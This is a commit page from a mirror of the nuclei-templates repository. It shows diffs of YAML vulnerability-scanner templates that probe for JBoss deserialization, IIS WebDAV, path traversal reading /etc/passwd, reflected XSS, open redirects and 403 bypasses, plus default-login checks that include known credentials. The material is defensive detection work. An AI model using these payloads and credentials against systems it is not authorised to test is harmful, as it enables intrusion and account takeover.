daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #51 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-05-16 18:32:39 +05:30 committed by GitHub
parent 19fac7242e 5488370527
commit b90e02d078
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
58 changed files with 720 additions and 178 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.github/workflows/syntax-checking.yml vendored
View File

@ -1,4 +1,4 @@
name: syntax-checking
name: ❄️ YAML Lint
on: [push, pull_request]

2
.github/workflows/update-readme.yml vendored
View File

@ -1,4 +1,4 @@
name: "Auto Update README"
name: 📝 Readme Update
on:
push:

12
README.md
View File

@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 309 | vulnerabilities | 152 | exposed-panels | 126 |
| takeovers | 67 | exposures | 96 | technologies | 66 |
| misconfiguration | 57 | workflows | 30 | miscellaneous | 20 |
| default-logins | 24 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 8 | helpers | 8 | iot | 11 |
| cves | 311 | vulnerabilities | 153 | exposed-panels | 127 |
| takeovers | 67 | exposures | 99 | technologies | 67 |
| misconfiguration | 62 | workflows | 30 | miscellaneous | 20 |
| default-logins | 26 | exposed-tokens | 0 | dns | 8 |
| fuzzing | 9 | helpers | 8 | iot | 11 |
**103 directories, 1068 files**.
**105 directories, 1085 files**.
</td>
</tr>

2
cves/2009/CVE-2009-1151.yaml
View File

@ -7,7 +7,7 @@ info:
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
tags: phpmyadmin,rce,deserialization
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:
- raw:

1
cves/2015/CVE-2015-2080.yaml
View File

@ -10,6 +10,7 @@ info:
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
description: |
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
tags: cve,cve2015,jetty
requests:
- method: POST

39
cves/2017/CVE-2017-12149.yaml Executable file
View File

@ -0,0 +1,39 @@
id: CVE-2017-12149
info:
name: Java/Jboss Deserialization [RCE]
author: fopina
severity: critical
description: In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization and thus allowing an attacker to execute arbitrary code via crafted serialized data.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2017-12149
- https://chowdera.com/2020/12/20201229190934023w.html
- https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
tags: cve,cve2017,java,rce,deserialization
requests:
- raw:
- |
POST /invoker/JMXInvokerServlet/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
- |
POST /invoker/EJBInvokerServlet/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/octet-stream
{{ base64_decode("rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==") }}
matchers-condition: and
matchers:
- type: word
words:
- "ClassCastException"
part: body
- type: word
words:
- "application/x-java-serialized-object"
part: header

14
cves/2017/CVE-2017-7269.yaml
View File

@ -1,25 +1,31 @@
id: CVE-2017-7269
info:
name: CVE-2017-7269
author: thomas_from_offensity
name: Windows Server 2003 & IIS 6.0 RCE
author: thomas_from_offensity & @geeknik
severity: critical
description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2
reference: https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
reference:
- https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html
- https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
tags: cve,cve2017,rce
requests:
- method: OPTIONS
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "IIS/6.0"
part: header
- type: dsl
dsl:
- regex("<DAV:sql>", dasl) # lowercase header name: DASL

2
cves/2017/CVE-2017-9506.yaml
View File

@ -9,7 +9,7 @@ info:
- http://dontpanic.42.nl/2017/12/there-is-proxy-in-your-atlassian.html
- https://ecosystem.atlassian.net/browse/OAUTH-344
- https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-171018bca2c3
tags: cve,cve2017,atlassian,jira,ssrf
tags: cve,cve2017,atlassian,jira,ssrf,oob
requests:
- raw:

62
cves/2018/CVE-2018-0101.yaml
View File

@ -1,62 +0,0 @@
id: CVE-2018-0101
info:
name: Cisco ASA Denial-of-Service # Leads to RCE
author: dwisiswant0
severity: critical
reference: https://www.exploit-db.com/exploits/43986
description: |
A vulnerability in the XML parser of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated,
remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that
the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition.
tags: cve,cve2018,cisco,dos,rce
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST / HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Aggregate-Auth: 1
X-Transcend-Version: 1
Accept-Encoding: identity
X-AnyConnect-Platform: linux-64
X-Support-HTTP-Auth: false
X-Pad: 0000000000000000000000000000000000000000
<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="a" type="a" aggregate-auth-version="a">
<host-scan-reply>A</host-scan-reply>
</config-auth>
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200"
- type: dsl
dsl:
- "status_code_2 == 500"
- "status_code_2 == 501"
- "status_code_2 == 502"
- "status_code_2 == 503"
- "status_code_2 == 504"
condition: or
- type: dsl
dsl:
- "status_code_3 == 200"
negative: true

2
cves/2018/CVE-2018-8770.yaml
View File

@ -7,7 +7,7 @@ info:
reference: |
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
- https://www.exploit-db.com/exploits/44495/
tags: cobub,razor,exposure
tags: cve,cve2018,cobub,razor,exposure
requests:
- method: GET

2
cves/2019/CVE-2019-17538.yaml
View File

@ -4,7 +4,7 @@ info:
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
tegs: cve.cve2019,jnoj,lfi
tags: cve.cve2019,jnoj,lfi
requests:
- raw:

1
cves/2020/CVE-2020-11991.yaml
View File

@ -4,6 +4,7 @@ info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
tags: cve,cve2020,apache,xml,cocoon
description: |
When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E

2
cves/2020/CVE-2020-13483.yaml
View File

@ -18,7 +18,7 @@ requests:
- type: word
words:
- "{alert(document.domain);}"
- "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
part: body
- type: word

4
cves/2020/CVE-2020-15500.yaml
View File

@ -11,7 +11,7 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E'
- '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
matchers-condition: and
matchers:
@ -26,5 +26,5 @@ requests:
- type: word
words:
- '"><script>alert(document.domain);</script>'
- "'>\"<svg/onload=confirm('xss')>"
part: body

2
cves/2020/CVE-2020-19625.yaml
View File

@ -26,4 +26,4 @@ requests:
part: body
group: 1
regex:
- "<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>"
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'

2
cves/2020/CVE-2020-28208.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
reference: https://trovent.io/security-advisory-2010-01
tags: rockethchat
tags: cve,cve2020,rockethchat
requests:
- raw:

6
cves/2020/CVE-2020-29164.yaml
View File

@ -11,7 +11,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
- "{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
matchers-condition: and
matchers:
@ -25,3 +25,7 @@ requests:
words:
- '<img src="" onerror="alert(1);">1</img>'
part: body
- type: status
status:
- 200

2
cves/2020/CVE-2020-7247.yaml
View File

@ -4,7 +4,7 @@ info:
author: princechaddha
severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce
tags: cve,cve2020,smtp,opensmtpd,network,rce,oob
network:
- inputs:

41
cves/2021/CVE-2021-27651.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2021-27651
info:
name: Pega Infinity Authentication bypass
author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference: |
- https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/prweb/PRAuth/app/default/"
cookie-reuse: true
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Pega Infinity"
part: body
- type: regex
regex:
- 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
part: body
extractors:
- type: regex
regex:
- 'Pega 8\.(?:2\.[1-9]|3\.[0-9]|4\.[0-9]|5\.[0-2])'
part: body

28
cves/2021/CVE-2021-31537.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2021-31537
info:
name: SIS-REWE GO version 7.5.0/12C XSS
author: geeknik
description: SIS SIS-REWE Go before 7.7 SP17 allows XSS -- rewe/prod/web/index.php (affected parameters are config, version, win, db, pwd, and user) and /rewe/prod/web/rewe_go_check.php (version and all other parameters).
reference: https://sec-consult.com/vulnerability-lab/advisory/reflected-xss-sis-infromatik-rewe-go-cve-2021-31537/
severity: medium
tags: cve,cve2021,xss
requests:
- method: GET
path:
- "{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>confirm({{randstr}})</script>"
- "SIS-REWE"
condition: and
- type: word
part: header
words:
- "text/html"

23
cves/2021/CVE-2021-31800.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CVE-2021-31800
info:
name: Impacket directory traversal
author: geeknik
description: Multiple path traversal vulnerabilities exist in smbserver.py in Impacket through 0.9.22. An attacker that connects to a running smbserver instance can list and write to arbitrary files via ../ directory traversal. This could potentially be abused to achieve arbitrary code execution by replacing /etc/shadow or an SSH authorized key.
reference: https://github.com/SecureAuthCorp/impacket/pull/1066
severity: high
tags: impacket,cve,cve2021,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"

45
default-logins/panabit/panabit-default-password.yaml Normal file
View File

@ -0,0 +1,45 @@
id: panabit-gateway-defalut-password
info:
name: Panabit Default Password
author: pikpikcu
severity: high
reference: https://max.book118.com/html/2017/0623/117514590.shtm
tags: panabit,default-login
requests:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
Content-Length: 246
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Referer: {{BaseURL}}/login/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="username"
admin
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="password"
panabit
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
matchers-condition: and
matchers:
- type: word
words:
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
- 'urn:schemas-microsoft-com:vml'
part: body
condition: and
- type: status
status:
- 200

31
default-logins/showdoc/showdoc-default-password.yaml Normal file
View File

@ -0,0 +1,31 @@
id: showdoc-default-password
info:
name: Showdoc Default Password
author: pikpikcu
severity: medium
reference: |
- https://blog.star7th.com/2016/05/2007.html
tags: showdoc,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/server/index.php?s=/api/user/login"
body: |
username=showdoc&password=123456&v_code=
headers:
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
matchers-condition: and
matchers:
- type: word
words:
- '"username":"showdoc"'
- '"user_token":'
condition: and
- type: status
status:
- 200

24
exposed-panels/microsoft-exchange-control-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: microsoft-exchange-control-panel
info:
name: Microsoft Exchange Control Panel
author: r3dg33k
severity: info
description: Publicly accessible Microsoft Exchange Server Control Panel
tags: microsoft,panel
reference: https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
requests:
- method: GET
path:
- "{{BaseURL}}/owa/auth/logon.aspx?replaceCurrent=1&url={{BaseURL}}/ecp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Exchange Admin Center'

15
exposed-panels/tomcat-manager-pathnormalization.yaml
View File

@ -1,4 +1,5 @@
id: tomcat-manager-pathnormalization
info:
name: Tomcat Manager Path Normalization
author: organiccrap
@ -11,11 +12,17 @@ requests:
path:
- '{{BaseURL}}/..;/manager/html'
- '{{BaseURL}}/..;/host-manager/html'
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:
- type: word
words:
- username="tomcat" password="s3cret"
- manager-gui
- 'username="tomcat" password="s3cret"'
- 'manager-gui'
condition: and
- type: status
status:
- 403
- 401
negative: true

54
exposures/backups/php-backup-files.yaml Normal file
View File

@ -0,0 +1,54 @@
id: php-backup-files
info:
name: PHP source disclosure through backup files
author: StreetOfHackerR007 (Rohit Soni)
severity: medium
tags: exposure,backup,php
requests:
- method: GET
path:
- "{{BaseURL}}/index.php.bak"
- "{{BaseURL}}/default.php.bak"
- "{{BaseURL}}/main.php.bak"
- "{{BaseURL}}/config.php.bak"
- "{{BaseURL}}/settings.php.bak"
- "{{BaseURL}}/header.php.bak"
- "{{BaseURL}}/footer.php.bak"
- "{{BaseURL}}/login.php.bak"
- "{{BaseURL}}/database.php.bak"
- "{{BaseURL}}/db.php.bak"
- "{{BaseURL}}/conn.php.bak"
- "{{BaseURL}}/db_config.php.bak"
- "{{BaseURL}}/404.php.bak"
- "{{BaseURL}}/wp-config.php.bak"
- "{{BaseURL}}/wp-login.php.bak"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "<?="
condition: or
part: body
- type: word
words:
- "?>"
part: body
- type: word
words:
- "text/plain"
- "bytes"
part: header
condition: or

4
exposures/configs/git-config-nginxoffbyslash.yaml
View File

@ -5,7 +5,9 @@ info:
severity: medium
description: Nginx off-by-slash vulnerability exposes Git configuration.
tags: config,exposure
reference: https://twitter.com/Random_Robbie/status/1262676628167110656
reference: |
- https://twitter.com/Random_Robbie/status/1262676628167110656
- https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py
requests:
- method: GET

1
exposures/configs/laravel-env.yaml
View File

@ -17,7 +17,6 @@ requests:
- "{{BaseURL}}/.env.prod.local"
- "{{BaseURL}}/.env.production.local"
- "{{BaseURL}}/.env.local"
- "{{BaseURL}}/.env.example"
- "{{BaseURL}}/.env.stage"
- "{{BaseURL}}/.env.live"
matchers-condition: and

25
exposures/configs/ruijie-phpinfo.yaml Normal file
View File

@ -0,0 +1,25 @@
id: ruijie-phpinfo
info:
name: Ruijie Phpinfo
author: pikpikcu
severity: low
reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20phpinfo.view.php%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
tags: phpinfo,rujjie,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/tool/view/phpinfo.view.php"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Version"
- "PHP Extension"
condition: and
- type: status
status:
- 200

47
fuzzing/xff-403-bypass.yaml Normal file
View File

@ -0,0 +1,47 @@
id: xff-403-bypass
info:
name: X-Forwarded-For 403-forbidden bypass
author: vavkamil
severity: info
description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header.
tags: xff,bypass,fuzz
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
- |
GET /test.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 == 403 && status_code_2 != 403"
- "status_code_1 == 403 && status_code_3 != 403"
condition: or

29
misconfiguration/apache-filename-brute-force.yaml Normal file
View File

@ -0,0 +1,29 @@
id: apache-filename-brute-force
info:
name: Apache Filename Brute Force
author: geeknik
description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing.
reference: |
- https://hackerone.com/reports/210238
- https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/
severity: low
tags: apache
requests:
- method: GET
headers:
Accept: "fake/value"
path:
- "{{BaseURL}}/index"
matchers-condition: and
matchers:
- type: status
status:
- 406
- type: word
words:
- "Not Acceptable"
- "Available variants:"
- "<address>Apache Server at"
condition: and

25
misconfiguration/cloudflare-image-ssrf.yaml Normal file
View File

@ -0,0 +1,25 @@
id: cloudflare-external-image-resize
info:
name: Cloudflare External Image Resizing Misconfiguration
author: vavkamil
severity: info
description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
tags: cloudflare,misconfig,oob
requests:
- raw:
- |
GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Connection: close
Accept: */*
Accept-Language: en
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

1
misconfiguration/springboot/springboot-configprops.yaml
View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure
requests:
- method: GET

11
misconfiguration/springboot/springboot-env.yaml
View File

@ -3,8 +3,9 @@ id: springboot-env
info:
name: Detect Springboot Env Actuator
author: that_juan_ & dwisiswant0 & wdahlenb
severity: high
severity: low
description: Sensitive environment variables may not be masked
tags: springboot,disclosure
requests:
- method: GET
@ -17,8 +18,14 @@ requests:
part: body
words:
- "applicationConfig"
- type: word
part: body
words:
- "server.port"
- "local.server.port"
condition: and
condition: or
- type: status
status:
- 200

8
misconfiguration/springboot/springboot-heapdump.yaml
View File

@ -5,12 +5,15 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb
severity: critical
description: Environment variables and HTTP requests can be found in the HPROF
tags: springboot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/heapdump"
- "{{BaseURL}}/actuator/heapdump"
max-size: 2097152 # 2MB - Max Size to read from server response
matchers-condition: and
matchers:
- type: binary
@ -20,16 +23,19 @@ requests:
- "4850524f46" # "HPROF"
- "1f8b080000000000" # Gunzip magic byte
condition: or
- type: status
status:
- 200
- type: word
words:
- "application/octet-stream"
- "application/vnd.spring-boot.actuator"
- "application/vnd.spring-boot.actuator.v1+json"
condition: or
part: header
condition: or
- type: dsl
dsl:
- "len(body) >= 100000"

1
misconfiguration/springboot/springboot-httptrace.yaml
View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure
requests:
- method: GET

1
misconfiguration/springboot/springboot-loggers.yaml
View File

@ -4,6 +4,7 @@ info:
name: Detect Springboot Loggers
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
tags: springboot,disclosure
requests:
- method: GET

1
misconfiguration/springboot/springboot-mappings.yaml
View File

@ -5,6 +5,7 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: Additional routes may be displayed
tags: springboot,disclosure
requests:
- method: GET

2
misconfiguration/springboot/springboot-trace.yaml
View File

@ -5,11 +5,13 @@ info:
author: that_juan_ & dwisiswant0 & wdahlenb
severity: low
description: View recent HTTP requests and responses
tags: springboot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/trace"
matchers-condition: and
matchers:
- type: word

59
network/rdp-detect.yaml Normal file
View File

@ -0,0 +1,59 @@
id: rdp-detect
info:
name: Windows RDP Detection
author: princechaddha
severity: info
tags: windows,rdp,network
network:
- inputs:
- data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000"
type: hex
read-size: 2048
host:
- "{{Hostname}}"
- "{{Hostname}}:3389"
matchers:
- type: word
encoding: hex
name: win2000
words:
- "0300000b06d00000123400"
- type: word
encoding: hex
name: win2003
words:
- "030000130ed000001234000300080002000000"
- type: word
encoding: hex
name: win2008
words:
- "030000130ed000001234000200080002000000"
- type: word
encoding: hex
name: win7or2008R2
words:
- "030000130ed000001234000209080002000000"
- type: word
encoding: hex
name: win2008R2DC
words:
- "030000130ed000001234000201080002000000"
- type: word
encoding: hex
name: win10
words:
- "030000130ed00000123400021f080002000000"
- type: word
encoding: hex
name: win2012R2OR8
words:
- "030000130ed00000123400020f080002000000"
- type: word
encoding: hex
name: win2016
words:
- "030000130ed00000123400021f080008000000"

20
technologies/detect-springboot-actuator.yaml
View File

@ -1,20 +0,0 @@
id: detect-springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"_links":{"self"'
- type: status
status:
- 200

27
technologies/springboot-actuator.yaml Normal file
View File

@ -0,0 +1,27 @@
id: springboot-actuator
info:
name: Detect Springboot Actuators
author: that_juan_ & dwisiswant0 & wdahlenb
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/actuator"
- "{{BaseURL}}/favicon.ico"
matchers-condition: or
matchers:
- type: word
part: body
words:
- '"_links":'
- '"self":'
- '"health"'
condition: and
- type: dsl
name: "favicon"
dsl:
- "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))"

25
technologies/wazuh-detect.yaml Normal file
View File

@ -0,0 +1,25 @@
id: wazuh-detect
info:
name: wazuh detect
author: cyllective
severity: info
description: Detects wazuh
tags: tech,wazuh
references:
- https://github.com/wazuh/wazuh
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
condition: or
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'

8
vulnerabilities/generic/open-redirect.yaml
View File

@ -21,10 +21,7 @@ requests:
- '{{BaseURL}}/example%E3%80%82com'
- '{{BaseURL}}/%5Cexample.com'
- '{{BaseURL}}/example.com'
- '{{BaseURL}}\example.com'
- '{{BaseURL}}//example.com/'
- '{{BaseURL}}\/\/example.com/'
- '{{BaseURL}}%00\/\/example.com/'
- '{{BaseURL}}/%00/example.com/'
- '{{BaseURL}}/%09/example.com/'
- '{{BaseURL}}/%0a/example.com/'
@ -33,14 +30,9 @@ requests:
- '{{BaseURL}}/%5cexample.com/%2f%2e%2e'
- '{{BaseURL}}@example.com'
- '{{BaseURL}}/{{BaseURL}}example.com'
- '{{BaseURL}}\{{BaseURL}}example.com'
- '{{BaseURL}}//{{BaseURL}}example.com/'
- '{{BaseURL}}\/\/{{BaseURL}}example.com/'
- '{{BaseURL}}%00\/\/{{BaseURL}}example.com/'
- '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}/〱{{BaseURL}}example.com/%2f%2e%2e'
- '{{BaseURL}}@{{BaseURL}}example.com'
- '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
matchers:
- type: regex

38
vulnerabilities/generic/top-xss-params.yaml
View File

@ -19,21 +19,21 @@ requests:
matchers:
- type: word
words:
- "\"<svg/onload=confirm('q')>"
- "\"<svg/onload=confirm('s')>"
- "\"<svg/onload=confirm('search')>"
- "\"<svg/onload=confirm('id')>"
- "\"<svg/onload=confirm('action')>"
- "\"<svg/onload=confirm('keyword')>"
- "\"<svg/onload=confirm('query')>"
- "\"<svg/onload=confirm('page')>"
- "\"<svg/onload=confirm('keywords')>"
- "\"<svg/onload=confirm('url')>"
- "\"<svg/onload=confirm('view')>"
- "\"<svg/onload=confirm('cat')>"
- "\"<svg/onload=confirm('name')>"
- "\"<svg/onload=confirm('key')>"
- "\"<svg/onload=confirm('p')>"
- "'>\"<svg/onload=confirm('q')>"
- "'>\"<svg/onload=confirm('s')>"
- "'>\"<svg/onload=confirm('search')>"
- "'>\"<svg/onload=confirm('id')>"
- "'>\"<svg/onload=confirm('action')>"
- "'>\"<svg/onload=confirm('keyword')>"
- "'>\"<svg/onload=confirm('query')>"
- "'>\"<svg/onload=confirm('page')>"
- "'>\"<svg/onload=confirm('keywords')>"
- "'>\"<svg/onload=confirm('url')>"
- "'>\"<svg/onload=confirm('view')>"
- "'>\"<svg/onload=confirm('cat')>"
- "'>\"<svg/onload=confirm('name')>"
- "'>\"<svg/onload=confirm('key')>"
- "'>\"<svg/onload=confirm('p')>"
part: body
condition: or
